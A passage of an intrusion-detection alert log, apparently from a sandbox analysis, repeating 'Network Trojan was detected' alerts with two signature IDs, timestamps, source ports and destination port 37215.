          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115225
          SID:2829579
          Source Port:39200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741493
          SID:2829579
          Source Port:45312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449364
          SID:2835222
          Source Port:55304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264286
          SID:2835222
          Source Port:59450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276720
          SID:2829579
          Source Port:55828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449717
          SID:2835222
          Source Port:39136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112051
          SID:2829579
          Source Port:48422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.187748
          SID:2835222
          Source Port:53070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706390
          SID:2829579
          Source Port:52426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037330
          SID:2835222
          Source Port:41888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260955
          SID:2829579
          Source Port:56820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730455
          SID:2829579
          Source Port:37310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.157808
          SID:2835222
          Source Port:49760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350821
          SID:2835222
          Source Port:46472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355274
          SID:2835222
          Source Port:46156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463799
          SID:2829579
          Source Port:51972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015091
          SID:2829579
          Source Port:55386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511477
          SID:2829579
          Source Port:32994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353368
          SID:2835222
          Source Port:34644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396205
          SID:2829579
          Source Port:53860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174882
          SID:2829579
          Source Port:51094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741830
          SID:2835222
          Source Port:50120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788384
          SID:2829579
          Source Port:58774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275630
          SID:2829579
          Source Port:60518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259860
          SID:2829579
          Source Port:57232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911969
          SID:2829579
          Source Port:59584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262883
          SID:2835222
          Source Port:45460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805061
          SID:2835222
          Source Port:39260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272961
          SID:2835222
          Source Port:60654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911626
          SID:2829579
          Source Port:48652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897326
          SID:2835222
          Source Port:42206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059873
          SID:2829579
          Source Port:33116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162613
          SID:2829579
          Source Port:59158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463968
          SID:2829579
          Source Port:41470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600607
          SID:2835222
          Source Port:34728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792544
          SID:2835222
          Source Port:35856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067858
          SID:2835222
          Source Port:59190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270791
          SID:2829579
          Source Port:42046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019781
          SID:2829579
          Source Port:55686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747977
          SID:2829579
          Source Port:51508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353768
          SID:2829579
          Source Port:53044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600734
          SID:2835222
          Source Port:59970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673643
          SID:2835222
          Source Port:40132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508847
          SID:2835222
          Source Port:38950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707276
          SID:2829579
          Source Port:60524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158714
          SID:2835222
          Source Port:33902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742851
          SID:2835222
          Source Port:56732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272141
          SID:2835222
          Source Port:49680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512418
          SID:2829579
          Source Port:53906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466271
          SID:2829579
          Source Port:42226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817345
          SID:2829579
          Source Port:43416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468835
          SID:2829579
          Source Port:42834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158131
          SID:2829579
          Source Port:59684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.821805
          SID:2829579
          Source Port:35152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160318
          SID:2829579
          Source Port:34190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509577
          SID:2829579
          Source Port:38958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.462967
          SID:2835222
          Source Port:48186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.862413
          SID:2835222
          Source Port:37126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510961
          SID:2829579
          Source Port:56412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730187
          SID:2829579
          Source Port:49508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113722
          SID:2835222
          Source Port:33604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817044
          SID:2835222
          Source Port:35586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160571
          SID:2835222
          Source Port:55758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672785
          SID:2835222
          Source Port:50972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740109
          SID:2829579
          Source Port:54684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542921
          SID:2835222
          Source Port:33280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150537
          SID:2835222
          Source Port:37830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410726
          SID:2835222
          Source Port:39516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112708
          SID:2835222
          Source Port:34470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127395
          SID:2829579
          Source Port:57130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781733
          SID:2835222
          Source Port:38356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704128
          SID:2829579
          Source Port:37214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035598
          SID:2835222
          Source Port:52340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601365
          SID:2835222
          Source Port:36096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175978
          SID:2835222
          Source Port:49092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238486
          SID:2835222
          Source Port:57934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545568
          SID:2835222
          Source Port:60470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896862
          SID:2835222
          Source Port:38394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019610
          SID:2835222
          Source Port:52658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841994
          SID:2829579
          Source Port:37664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796587
          SID:2835222
          Source Port:56630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.676249
          SID:2835222
          Source Port:41034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236716
          SID:2835222
          Source Port:56074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707793
          SID:2835222
          Source Port:52762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742197
          SID:2835222
          Source Port:55932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016457
          SID:2835222
          Source Port:34014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788280
          SID:2835222
          Source Port:56450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355195
          SID:2835222
          Source Port:58146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551663
          SID:2835222
          Source Port:45108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742285
          SID:2829579
          Source Port:51042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109301
          SID:2835222
          Source Port:47012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745954
          SID:2835222
          Source Port:54690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.265882
          SID:2829579
          Source Port:46300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461638
          SID:2835222
          Source Port:36402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460900
          SID:2835222
          Source Port:44708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160557
          SID:2829579
          Source Port:45708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884094
          SID:2835222
          Source Port:54138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162674
          SID:2835222
          Source Port:35446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351281
          SID:2829579
          Source Port:57814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350958
          SID:2829579
          Source Port:37650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448417
          SID:2829579
          Source Port:40822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446241
          SID:2835222
          Source Port:34624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239582
          SID:2835222
          Source Port:57336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021439
          SID:2835222
          Source Port:34250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112499
          SID:2835222
          Source Port:40518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600869
          SID:2829579
          Source Port:40142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817340
          SID:2835222
          Source Port:51498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133842
          SID:2835222
          Source Port:57112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355594
          SID:2829579
          Source Port:46234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516723
          SID:2829579
          Source Port:58542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512323
          SID:2829579
          Source Port:36542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352991
          SID:2835222
          Source Port:60850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744189
          SID:2835222
          Source Port:56296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179446
          SID:2829579
          Source Port:37522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730034
          SID:2835222
          Source Port:41482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599706
          SID:2835222
          Source Port:60814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040528
          SID:2829579
          Source Port:57706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817623
          SID:2829579
          Source Port:40152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893323
          SID:2835222
          Source Port:60366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.134278
          SID:2829579
          Source Port:43814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352527
          SID:2829579
          Source Port:49080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273076
          SID:2835222
          Source Port:56986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547861
          SID:2829579
          Source Port:53744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178031
          SID:2835222
          Source Port:43890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179720
          SID:2829579
          Source Port:44444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704208
          SID:2829579
          Source Port:57244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306415
          SID:2835222
          Source Port:43332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731680
          SID:2829579
          Source Port:42170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549703
          SID:2835222
          Source Port:39616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822417
          SID:2829579
          Source Port:41980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273270
          SID:2829579
          Source Port:48888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159325
          SID:2829579
          Source Port:45386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739511
          SID:2835222
          Source Port:47068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740683
          SID:2835222
          Source Port:55668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745568
          SID:2829579
          Source Port:42430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448564
          SID:2835222
          Source Port:39872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734367
          SID:2835222
          Source Port:57104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005639
          SID:2835222
          Source Port:48980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126124
          SID:2835222
          Source Port:42562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.803326
          SID:2829579
          Source Port:53864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266094
          SID:2829579
          Source Port:52502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.827784
          SID:2835222
          Source Port:49362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180161
          SID:2835222
          Source Port:37254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172632
          SID:2829579
          Source Port:60214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017112
          SID:2829579
          Source Port:56086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730989
          SID:2829579
          Source Port:38838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817732
          SID:2835222
          Source Port:59212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353163
          SID:2829579
          Source Port:46512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110165
          SID:2829579
          Source Port:36242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510338
          SID:2835222
          Source Port:46802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704628
          SID:2829579
          Source Port:44964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449190
          SID:2829579
          Source Port:39202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.462978
          SID:2835222
          Source Port:39994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.116577
          SID:2829579
          Source Port:52500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551866
          SID:2835222
          Source Port:42138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272100
          SID:2829579
          Source Port:38480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887739
          SID:2835222
          Source Port:60328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056724
          SID:2835222
          Source Port:38616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178847
          SID:2835222
          Source Port:44468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016153
          SID:2829579
          Source Port:43948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888167
          SID:2829579
          Source Port:41452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468634
          SID:2829579
          Source Port:60690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509476
          SID:2835222
          Source Port:57248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175572
          SID:2829579
          Source Port:33572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188133
          SID:2835222
          Source Port:48056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857616
          SID:2829579
          Source Port:59528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099161
          SID:2829579
          Source Port:36356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707299
          SID:2835222
          Source Port:60068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161716
          SID:2829579
          Source Port:37922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184041
          SID:2829579
          Source Port:43862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240468
          SID:2829579
          Source Port:58144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108771
          SID:2835222
          Source Port:44114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708053
          SID:2829579
          Source Port:45912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510445
          SID:2829579
          Source Port:36074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471838
          SID:2835222
          Source Port:56590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672323
          SID:2829579
          Source Port:58302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816386
          SID:2835222
          Source Port:33864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270682
          SID:2829579
          Source Port:44694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233704
          SID:2829579
          Source Port:55028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708926
          SID:2835222
          Source Port:38138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512139
          SID:2829579
          Source Port:32868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017232
          SID:2829579
          Source Port:37028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266060
          SID:2835222
          Source Port:57710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732848
          SID:2829579
          Source Port:52150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177208
          SID:2835222
          Source Port:43266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.796379
          SID:2835222
          Source Port:35268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043482
          SID:2835222
          Source Port:34556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912080
          SID:2829579
          Source Port:45696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268466
          SID:2829579
          Source Port:54252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163815
          SID:2835222
          Source Port:39740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356058
          SID:2829579
          Source Port:33574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550787
          SID:2829579
          Source Port:54944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135069
          SID:2829579
          Source Port:43054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274604
          SID:2835222
          Source Port:53692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663715
          SID:2835222
          Source Port:33378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087399
          SID:2829579
          Source Port:56072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.824949
          SID:2835222
          Source Port:58826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
